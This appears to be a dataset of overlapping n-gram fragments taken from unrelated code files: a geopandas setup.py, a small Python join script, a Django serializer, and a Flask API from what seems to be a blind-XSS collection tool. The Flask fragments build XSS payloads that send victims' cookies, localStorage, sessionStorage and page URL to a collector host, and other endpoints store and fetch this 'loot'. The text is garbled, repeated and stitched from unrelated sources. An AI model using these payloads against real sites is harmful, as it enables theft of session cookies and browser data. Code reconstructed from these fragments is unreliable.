ngram
listlengths 0
67.8k
|
|---|
[
"long_description=LONG_DESCRIPTION, packages=[ \"geopandas\", \"geopandas.io\", \"geopandas.tools\", \"geopandas.datasets\", \"geopandas.tests\", \"geopandas.tools.tests\", ], package_data={\"geopandas\": data_files}, python_requires=\">=3.6\", install_requires=INSTALL_REQUIRES,",
"import setup setup( name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic pandas extensions\", license=\"BSD\", author=\"GeoPandas contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\",",
"version=versioneer.get_version(), description=\"Geographic pandas extensions\", license=\"BSD\", author=\"GeoPandas contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[ \"geopandas\", \"geopandas.io\",",
"author=\"GeoPandas contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[ \"geopandas\", \"geopandas.io\", \"geopandas.tools\", \"geopandas.datasets\", \"geopandas.tests\", \"geopandas.tools.tests\", ],",
"description=\"Geographic pandas extensions\", license=\"BSD\", author=\"GeoPandas contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[ \"geopandas\", \"geopandas.io\", \"geopandas.tools\",",
"setup( name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic pandas extensions\", license=\"BSD\", author=\"GeoPandas contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[",
"url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[ \"geopandas\", \"geopandas.io\", \"geopandas.tools\", \"geopandas.datasets\", \"geopandas.tests\", \"geopandas.tools.tests\", ], package_data={\"geopandas\": data_files}, python_requires=\">=3.6\",",
"import setup except ImportError: from distutils.core import setup setup( name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic pandas",
"setup except ImportError: from distutils.core import setup setup( name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic pandas extensions\",",
"setuptools import setup except ImportError: from distutils.core import setup setup( name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic",
"setup setup( name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic pandas extensions\", license=\"BSD\", author=\"GeoPandas contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION,",
"pandas extensions\", license=\"BSD\", author=\"GeoPandas contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[ \"geopandas\", \"geopandas.io\", \"geopandas.tools\", \"geopandas.datasets\",",
"\"geopandas\", \"geopandas.io\", \"geopandas.tools\", \"geopandas.datasets\", \"geopandas.tests\", \"geopandas.tools.tests\", ], package_data={\"geopandas\": data_files}, python_requires=\">=3.6\", install_requires=INSTALL_REQUIRES, cmdclass=versioneer.get_cmdclass(), )",
"license=\"BSD\", author=\"GeoPandas contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[ \"geopandas\", \"geopandas.io\", \"geopandas.tools\", \"geopandas.datasets\", \"geopandas.tests\", \"geopandas.tools.tests\",",
"name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic pandas extensions\", license=\"BSD\", author=\"GeoPandas contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[ \"geopandas\",",
"packages=[ \"geopandas\", \"geopandas.io\", \"geopandas.tools\", \"geopandas.datasets\", \"geopandas.tests\", \"geopandas.tools.tests\", ], package_data={\"geopandas\": data_files}, python_requires=\">=3.6\", install_requires=INSTALL_REQUIRES, cmdclass=versioneer.get_cmdclass(),",
"author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[ \"geopandas\", \"geopandas.io\", \"geopandas.tools\", \"geopandas.datasets\", \"geopandas.tests\", \"geopandas.tools.tests\", ], package_data={\"geopandas\": data_files},",
"except ImportError: from distutils.core import setup setup( name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic pandas extensions\", license=\"BSD\",",
"os try: from setuptools import setup except ImportError: from distutils.core import setup setup(",
"from setuptools import setup except ImportError: from distutils.core import setup setup( name=\"geopandas\", version=versioneer.get_version(),",
"ImportError: from distutils.core import setup setup( name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic pandas extensions\", license=\"BSD\", author=\"GeoPandas",
"try: from setuptools import setup except ImportError: from distutils.core import setup setup( name=\"geopandas\",",
"extensions\", license=\"BSD\", author=\"GeoPandas contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[ \"geopandas\", \"geopandas.io\", \"geopandas.tools\", \"geopandas.datasets\", \"geopandas.tests\",",
"from distutils.core import setup setup( name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic pandas extensions\", license=\"BSD\", author=\"GeoPandas contributors\",",
"import os try: from setuptools import setup except ImportError: from distutils.core import setup",
"distutils.core import setup setup( name=\"geopandas\", version=versioneer.get_version(), description=\"Geographic pandas extensions\", license=\"BSD\", author=\"GeoPandas contributors\", author_email=\"<EMAIL>\",",
"contributors\", author_email=\"<EMAIL>\", url=\"http://geopandas.org\", long_description=LONG_DESCRIPTION, packages=[ \"geopandas\", \"geopandas.io\", \"geopandas.tools\", \"geopandas.datasets\", \"geopandas.tests\", \"geopandas.tools.tests\", ], package_data={\"geopandas\":"
] |
[
"\" , \".join(list) # print(a , \" other are wwe superstars\") a =",
"\".join(list) # print(a , \" other are wwe superstars\") a = 123 def",
"[\"John\",\"Cena\",\"Randy\",\"Orton\",\"Sheamus\",\"Khali\",\"<NAME>\"] # # for item in list: # # print(item,\"and\",end=\" \") # #",
"= [\"John\",\"Cena\",\"Randy\",\"Orton\",\"Sheamus\",\"Khali\",\"<NAME>\"] # # for item in list: # # print(item,\"and\",end=\" \") #",
"# print(item,\"and\",end=\" \") # # # a = \" , \".join(list) # print(a",
"= \" , \".join(list) # print(a , \" other are wwe superstars\") a",
"# for item in list: # # print(item,\"and\",end=\" \") # # # a",
"# print(a , \" other are wwe superstars\") a = 123 def fun():",
"print(a , \" other are wwe superstars\") a = 123 def fun(): a",
"# # a = \" , \".join(list) # print(a , \" other are",
"# a = \" , \".join(list) # print(a , \" other are wwe",
"other are wwe superstars\") a = 123 def fun(): a = [] print(type(a))",
"list: # # print(item,\"and\",end=\" \") # # # a = \" , \".join(list)",
"# # print(item,\"and\",end=\" \") # # # a = \" , \".join(list) #",
"\" other are wwe superstars\") a = 123 def fun(): a = []",
"print(item,\"and\",end=\" \") # # # a = \" , \".join(list) # print(a ,",
"# # # a = \" , \".join(list) # print(a , \" other",
", \" other are wwe superstars\") a = 123 def fun(): a =",
"item in list: # # print(item,\"and\",end=\" \") # # # a = \"",
"in list: # # print(item,\"and\",end=\" \") # # # a = \" ,",
"# # for item in list: # # print(item,\"and\",end=\" \") # # #",
"Function.py # list = [\"John\",\"Cena\",\"Randy\",\"Orton\",\"Sheamus\",\"Khali\",\"<NAME>\"] # # for item in list: # #",
", \".join(list) # print(a , \" other are wwe superstars\") a = 123",
"\") # # # a = \" , \".join(list) # print(a , \"",
"<filename>Misc/Join Function.py # list = [\"John\",\"Cena\",\"Randy\",\"Orton\",\"Sheamus\",\"Khali\",\"<NAME>\"] # # for item in list: #",
"list = [\"John\",\"Cena\",\"Randy\",\"Orton\",\"Sheamus\",\"Khali\",\"<NAME>\"] # # for item in list: # # print(item,\"and\",end=\" \")",
"# list = [\"John\",\"Cena\",\"Randy\",\"Orton\",\"Sheamus\",\"Khali\",\"<NAME>\"] # # for item in list: # # print(item,\"and\",end=\"",
"for item in list: # # print(item,\"and\",end=\" \") # # # a =",
"a = \" , \".join(list) # print(a , \" other are wwe superstars\")"
] |
[
"fields = ['service'] def validate(self, attrs): try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except ServiceView.DoesNotExist: return attrs",
"Service class ServiceViewSerializer(serializers.ModelSerializer): service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta: model = ServiceView fields =",
"ServiceView fields = ['service'] def validate(self, attrs): try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except ServiceView.DoesNotExist: return",
"import ServiceView from linuxmachinebeta.services.models import Service class ServiceViewSerializer(serializers.ModelSerializer): service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta:",
"ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except ServiceView.DoesNotExist: return attrs else: raise serializers.ValidationError(_('You have already viewed this",
"django.utils.translation import gettext_lazy as _ from rest_framework import serializers from linuxmachinebeta.view.models import ServiceView",
"ServiceViewSerializer(serializers.ModelSerializer): service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta: model = ServiceView fields = ['service'] def",
"as _ from rest_framework import serializers from linuxmachinebeta.view.models import ServiceView from linuxmachinebeta.services.models import",
"linuxmachinebeta.view.models import ServiceView from linuxmachinebeta.services.models import Service class ServiceViewSerializer(serializers.ModelSerializer): service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class",
"rest_framework import serializers from linuxmachinebeta.view.models import ServiceView from linuxmachinebeta.services.models import Service class ServiceViewSerializer(serializers.ModelSerializer):",
"_ from rest_framework import serializers from linuxmachinebeta.view.models import ServiceView from linuxmachinebeta.services.models import Service",
"from django.utils.translation import gettext_lazy as _ from rest_framework import serializers from linuxmachinebeta.view.models import",
"attrs): try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except ServiceView.DoesNotExist: return attrs else: raise serializers.ValidationError(_('You have already",
"user_ip=self.context['user_ip']) except ServiceView.DoesNotExist: return attrs else: raise serializers.ValidationError(_('You have already viewed this service.'))",
"= ['service'] def validate(self, attrs): try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except ServiceView.DoesNotExist: return attrs else:",
"model = ServiceView fields = ['service'] def validate(self, attrs): try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except",
"serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta: model = ServiceView fields = ['service'] def validate(self, attrs): try:",
"service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta: model = ServiceView fields = ['service'] def validate(self,",
"from linuxmachinebeta.view.models import ServiceView from linuxmachinebeta.services.models import Service class ServiceViewSerializer(serializers.ModelSerializer): service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all())",
"Meta: model = ServiceView fields = ['service'] def validate(self, attrs): try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip'])",
"linuxmachinebeta.services.models import Service class ServiceViewSerializer(serializers.ModelSerializer): service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta: model = ServiceView",
"class Meta: model = ServiceView fields = ['service'] def validate(self, attrs): try: ServiceView.objects.get(service=attrs['service'],",
"from rest_framework import serializers from linuxmachinebeta.view.models import ServiceView from linuxmachinebeta.services.models import Service class",
"<filename>linuxmachinebeta/view/api/serializers.py from django.utils.translation import gettext_lazy as _ from rest_framework import serializers from linuxmachinebeta.view.models",
"validate(self, attrs): try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except ServiceView.DoesNotExist: return attrs else: raise serializers.ValidationError(_('You have",
"import gettext_lazy as _ from rest_framework import serializers from linuxmachinebeta.view.models import ServiceView from",
"gettext_lazy as _ from rest_framework import serializers from linuxmachinebeta.view.models import ServiceView from linuxmachinebeta.services.models",
"class ServiceViewSerializer(serializers.ModelSerializer): service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta: model = ServiceView fields = ['service']",
"= ServiceView fields = ['service'] def validate(self, attrs): try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except ServiceView.DoesNotExist:",
"def validate(self, attrs): try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except ServiceView.DoesNotExist: return attrs else: raise serializers.ValidationError(_('You",
"from linuxmachinebeta.services.models import Service class ServiceViewSerializer(serializers.ModelSerializer): service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta: model =",
"ServiceView from linuxmachinebeta.services.models import Service class ServiceViewSerializer(serializers.ModelSerializer): service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta: model",
"import serializers from linuxmachinebeta.view.models import ServiceView from linuxmachinebeta.services.models import Service class ServiceViewSerializer(serializers.ModelSerializer): service",
"['service'] def validate(self, attrs): try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except ServiceView.DoesNotExist: return attrs else: raise",
"try: ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip']) except ServiceView.DoesNotExist: return attrs else: raise serializers.ValidationError(_('You have already viewed",
"= serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta: model = ServiceView fields = ['service'] def validate(self, attrs):",
"serializers from linuxmachinebeta.view.models import ServiceView from linuxmachinebeta.services.models import Service class ServiceViewSerializer(serializers.ModelSerializer): service =",
"import Service class ServiceViewSerializer(serializers.ModelSerializer): service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all()) class Meta: model = ServiceView fields"
] |
[
"'Unknown code type'}), 400 elif param == 'geturl': get_url = True require_js =",
"= 'r' require_js = False require_params = False cookies = False local_storage =",
"or session_storage: payload += '+\"&' payload += 'origin_url=\"+encodeURIComponent(location.href)' if other_data != '': if",
"== 'geturl': get_url = True require_js = True require_params = True else: if",
"xss_loot_get(xss_id, loot_type): \"\"\"Gets a specific type of data for an XSS\"\"\" xss =",
"data.pop(loot_type, None) xss.data = json.dumps(data) db.session.commit() return jsonify({'status': 'OK', 'detail': 'Data deleted successfuly'}),",
"xss_generate(id): \"\"\"Generates an XSS payload\"\"\" client = Client.query.filter_by(id=id).first_or_404() uid = client.uid parameters =",
"True if i_want_it_all: if code_type == 'js': payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url,",
"import permissions import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id): \"\"\"Generates an XSS payload\"\"\"",
"'+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url: if cookies or local_storage or session_storage: payload",
"cookies = True require_js = True require_params = True elif param == 'local_storage':",
"xss_type, uid) if require_params: payload += '?' if cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)' if",
"'code': if value == 'html': code_type = 'html' elif value == 'js': code_type",
"+= '</script>' else: payload += ' />' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required",
"False cookies = False local_storage = False session_storage = False get_url = False",
"url, url, xss_type, uid, other_data) return (payload), 200 else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\",",
"payload = \"\"\"'>\">\"\"\" if require_js: payload += '<script>new Image().src=\"' else: payload += '<img",
"'XSS deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def xss_loot_get(xss_id, loot_type): \"\"\"Gets a specific",
"db.session.delete(xss) db.session.commit() return jsonify({'status': 'OK', 'detail': 'XSS deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required",
"if param == 'url': url = value elif param == 'i_want_it_all': i_want_it_all =",
"if session_storage: if cookies or local_storage: payload += '+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if",
"\"{}\")</script>\"\"\".format( url, url, xss_type, uid, other_data) return (payload), 200 if code_type == 'js':",
"if 'url' not in parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400",
"data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) data.pop(loot_type, None) xss.data",
"'html' elif value == 'js': code_type = 'js' require_js = True else: return",
"jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400 elif param == 'geturl': get_url =",
"an XSS payload\"\"\" client = Client.query.filter_by(id=id).first_or_404() uid = client.uid parameters = request.args.to_dict() other_data",
"cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if cookies: payload += '+\"&' payload +=",
"methods=['GET']) @login_required def xss_loot_get(xss_id, loot_type): \"\"\"Gets a specific type of data for an",
"= True elif param == 'local_storage': local_storage = True require_js = True require_params",
"= value elif param == 'i_want_it_all': i_want_it_all = True elif param == 'stored':",
"import jsonify, request from app import db from app.models import Client, XSS from",
"uid, other_data) return (payload), 200 else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url,",
"methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a specific type of data",
"bp from flask_login import login_required, current_user from app.decorators import permissions import json @bp.route('/xss/generate/<id>',",
"parameter'}), 400 for param, value in parameters.items(): if param == 'url': url =",
"xss_type = 'r' require_js = False require_params = False cookies = False local_storage",
"= request.args.to_dict() other_data = '' xss_type = 'r' require_js = False require_params =",
"require_js = True require_params = True elif param == 'session_storage': session_storage = True",
"'detail': 'Missing url parameter'}), 400 for param, value in parameters.items(): if param ==",
"an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return jsonify({'status': 'OK', 'detail': 'XSS deleted",
"Image().src=\"' else: payload += '<img src=\"' payload += '{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params:",
"'js': payload = ';};new Image().src=\"' else: payload = \"\"\"'>\">\"\"\" if require_js: payload +=",
"payload += '</script>' else: payload += ' />' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE'])",
"from app.api import bp from flask_login import login_required, current_user from app.decorators import permissions",
"session_storage: payload += '+\"&' payload += 'origin_url=\"+encodeURIComponent(location.href)' if other_data != '': if cookies",
"deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def xss_loot_get(xss_id, loot_type): \"\"\"Gets a specific type",
"from flask import jsonify, request from app import db from app.models import Client,",
"else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type, uid, other_data) return (payload),",
"XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) return jsonify({'data': data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner'])",
"local_storage: payload += '+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url: if cookies or local_storage",
"if not require_params: payload += '\"' if code_type == 'js': payload += ';'",
"else: if other_data != '': other_data += '&' other_data += '{}={}'.format(param, value) require_params",
"cookies or local_storage or session_storage or get_url: payload += '+\"&' payload += other_data",
"@permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a specific type of data for an",
"'+\"&' payload += 'origin_url=\"+encodeURIComponent(location.href)' if other_data != '': if cookies or local_storage or",
"payload += '+\"&' payload += other_data payload += '\"' if not require_params: payload",
"True elif param == 'local_storage': local_storage = True require_js = True require_params =",
"= XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) return jsonify({'data': data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required @permissions(one_of=['admin',",
"param == 'session_storage': session_storage = True require_js = True require_params = True elif",
"flask_login import login_required, current_user from app.decorators import permissions import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required",
"require_params = True elif param == 'local_storage': local_storage = True require_js = True",
"True elif param == 'code': if value == 'html': code_type = 'html' elif",
"True require_js = True require_params = True elif param == 'local_storage': local_storage =",
"(payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss",
"param == 'i_want_it_all': i_want_it_all = True elif param == 'stored': xss_type = 's'",
"True else: return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400 elif param ==",
"'': if cookies or local_storage or session_storage or get_url: payload += '+\"&' payload",
"True elif param == 'stored': xss_type = 's' elif param == 'cookies': cookies",
"None) xss.data = json.dumps(data) db.session.commit() return jsonify({'status': 'OK', 'detail': 'Data deleted successfuly'}), 200",
"value == 'js': code_type = 'js' require_js = True else: return jsonify({'status': 'error',",
"/>' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an",
"= 'html' if 'url' not in parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing url",
"== 'url': url = value elif param == 'i_want_it_all': i_want_it_all = True elif",
"jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400 for param, value in parameters.items(): if",
"data = json.loads(xss.data) return jsonify({'data': data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def",
"if other_data != '': other_data += '&' other_data += '{}={}'.format(param, value) require_params =",
"Client.query.filter_by(id=id).first_or_404() uid = client.uid parameters = request.args.to_dict() other_data = '' xss_type = 'r'",
"XSS payload\"\"\" client = Client.query.filter_by(id=id).first_or_404() uid = client.uid parameters = request.args.to_dict() other_data =",
"elif param == 'stored': xss_type = 's' elif param == 'cookies': cookies =",
"from app.decorators import permissions import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id): \"\"\"Generates an",
"elif param == 'geturl': get_url = True require_js = True require_params = True",
"= True require_params = True else: if other_data != '': other_data += '&'",
"cookies or local_storage or session_storage: payload += '+\"&' payload += 'origin_url=\"+encodeURIComponent(location.href)' if other_data",
"== 'cookies': cookies = True require_js = True require_params = True elif param",
"'stored': xss_type = 's' elif param == 'cookies': cookies = True require_js =",
"XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) data.pop(loot_type, None) xss.data = json.dumps(data) db.session.commit() return jsonify({'status': 'OK',",
"'cookies': cookies = True require_js = True require_params = True elif param ==",
"True require_params = True elif param == 'session_storage': session_storage = True require_js =",
"payload += '+\"&' payload += 'origin_url=\"+encodeURIComponent(location.href)' if other_data != '': if cookies or",
"xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a specific type of data for an XSS\"\"\" xss =",
"True require_params = True elif param == 'local_storage': local_storage = True require_js =",
"jsonify({'data': data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a",
"for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) data.pop(loot_type, None) xss.data =",
"payload += '<script>new Image().src=\"' else: payload += '<img src=\"' payload += '{}/api/x/{}/{}'.format(url, xss_type,",
"if cookies or local_storage: payload += '+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url: if",
"'\"' if not require_params: payload += '\"' if code_type == 'js': payload +=",
"+= ' />' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id):",
"for param, value in parameters.items(): if param == 'url': url = value elif",
"'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if cookies: payload += '+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage:",
"payload += other_data payload += '\"' if not require_params: payload += '\"' if",
"uid) if require_params: payload += '?' if cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage:",
"(payload), 200 if code_type == 'js': payload = ';};new Image().src=\"' else: payload =",
"= client.uid parameters = request.args.to_dict() other_data = '' xss_type = 'r' require_js =",
"specific type of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data)",
"== 'js': payload = ';};new Image().src=\"' else: payload = \"\"\"'>\">\"\"\" if require_js: payload",
"permissions import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id): \"\"\"Generates an XSS payload\"\"\" client",
"in parameters.items(): if param == 'url': url = value elif param == 'i_want_it_all':",
"== 'js': code_type = 'js' require_js = True else: return jsonify({'status': 'error', 'detail':",
"else: payload += '<img src=\"' payload += '{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params: payload",
"code_type = 'html' if 'url' not in parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing",
"elif param == 'local_storage': local_storage = True require_js = True require_params = True",
"'detail': 'Unknown code type'}), 400 elif param == 'geturl': get_url = True require_js",
"+= 'origin_url=\"+encodeURIComponent(location.href)' if other_data != '': if cookies or local_storage or session_storage or",
"require_params = True elif param == 'session_storage': session_storage = True require_js = True",
"an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) data.pop(loot_type, None) xss.data = json.dumps(data)",
"(payload), 200 else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type, uid, other_data)",
"local_storage: if cookies: payload += '+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies",
"src=\"' payload += '{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params: payload += '?' if cookies:",
"cookies or local_storage: payload += '+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url: if cookies",
"\"\"\"Gets a specific type of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data",
"require_params: payload += '\"' if code_type == 'js': payload += ';' else: if",
"elif param == 'session_storage': session_storage = True require_js = True require_params = True",
"an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) return jsonify({'data': data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>',",
"other_data += '{}={}'.format(param, value) require_params = True if i_want_it_all: if code_type == 'js':",
"!= '': if cookies or local_storage or session_storage or get_url: payload += '+\"&'",
"local_storage or session_storage or get_url: payload += '+\"&' payload += other_data payload +=",
"True require_js = True require_params = True else: if other_data != '': other_data",
"True require_params = True else: if other_data != '': other_data += '&' other_data",
"' />' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes",
"return (payload), 200 if code_type == 'js': payload = ';};new Image().src=\"' else: payload",
"type of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) return",
"elif param == 'i_want_it_all': i_want_it_all = True elif param == 'stored': xss_type =",
"import db from app.models import Client, XSS from app.api import bp from flask_login",
"code_type == 'js': payload = ';};new Image().src=\"' else: payload = \"\"\"'>\">\"\"\" if require_js:",
"False session_storage = False get_url = False i_want_it_all = False code_type = 'html'",
"i_want_it_all = False code_type = 'html' if 'url' not in parameters.keys(): return jsonify({'status':",
"@login_required def xss_loot_get(xss_id, loot_type): \"\"\"Gets a specific type of data for an XSS\"\"\"",
"'js': payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url, xss_type, uid, other_data) return (payload), 200",
"app.decorators import permissions import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id): \"\"\"Generates an XSS",
"'\"' if code_type == 'js': payload += ';' else: if require_js: payload +=",
"cookies: payload += '+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or local_storage:",
"\"\"\"Deletes a specific type of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data",
"if cookies: payload += '+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or",
"cookies = False local_storage = False session_storage = False get_url = False i_want_it_all",
"'i_want_it_all': i_want_it_all = True elif param == 'stored': xss_type = 's' elif param",
"url, xss_type, uid, other_data) return (payload), 200 if code_type == 'js': payload =",
"i_want_it_all: if code_type == 'js': payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url, xss_type, uid,",
"url = value elif param == 'i_want_it_all': i_want_it_all = True elif param ==",
"payload += '\"' if code_type == 'js': payload += ';' else: if require_js:",
"if other_data != '': if cookies or local_storage or session_storage or get_url: payload",
"200 else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type, uid, other_data) return",
"= \"\"\"'>\">\"\"\" if require_js: payload += '<script>new Image().src=\"' else: payload += '<img src=\"'",
"= True require_js = True require_params = True elif param == 'code': if",
"== 'code': if value == 'html': code_type = 'html' elif value == 'js':",
"of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) data.pop(loot_type, None)",
"= 'js' require_js = True else: return jsonify({'status': 'error', 'detail': 'Unknown code type'}),",
"'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url: if cookies or local_storage or session_storage: payload += '+\"&' payload",
"require_params = False cookies = False local_storage = False session_storage = False get_url",
